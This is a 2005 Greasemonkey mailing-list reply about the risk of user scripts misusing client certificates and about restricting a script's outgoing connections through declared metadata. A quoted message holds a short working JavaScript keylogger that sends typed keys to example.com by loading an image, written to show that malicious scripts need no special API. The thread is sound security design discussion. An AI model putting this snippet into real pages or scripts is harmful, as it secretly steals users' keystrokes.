[Greasemonkey] food for thought: client certificate authentication and GM

Nic Ferrier nferrier at tapsellferrier.co.uk
Thu Jul 28 03:44:50 EDT 2005


Mark Pilgrim <pilgrim at gmail.com> writes:

> On 7/27/05, Nic Ferrier <nferrier at tapsellferrier.co.uk> wrote:
>> I'm not sure what, if anything GM could do about this. My only thought
>> is that each GM script should declare quite clearly what other
>> locations it connects to and allow the user to see that and agree or
>> not.
>
> Since presumably a script that wanted to do nefarious things with your
> client-side certificates would also want to hide this fact, such a
> voluntary declaration would be useless.  

Sorry. I wasn't clear. I meant that GM would also validate outgoing
requests against the meta data. So if the script's meta data said:

  @connect2sites www.scaryplaceontheinternet.com

then only that would be a possible connection destination. The meta
could be used to tell the user about the places the script connects to
and GM would ensure that it happened.


> We have discussed the possibility of turning off GM_xmlhttpRequest
> and allowing the end user to configure which scripts are allowed to
> use it.  But there are still a near-infinite number of ways a script
> can be malicious, even without GM_xmlhttpRequest.  Want to log
> everything the user types and send it to Russia?
>
> var keys = '';
> document.addEventListener('keypress', function(event) {
>     keys += String.fromCharCode(event.which);
>     if (keys.length > 5) {
> 	var img = document.createElement('img');
> 	img.src = 'http://example.com/?q=' + keys;
> 	document.body.appendChild(img);
> 	document.body.removeChild(img);
>     }
> }, true);
>
> API functions required: 0.

This is a very good point.


Nic


More information about the Greasemonkey mailing list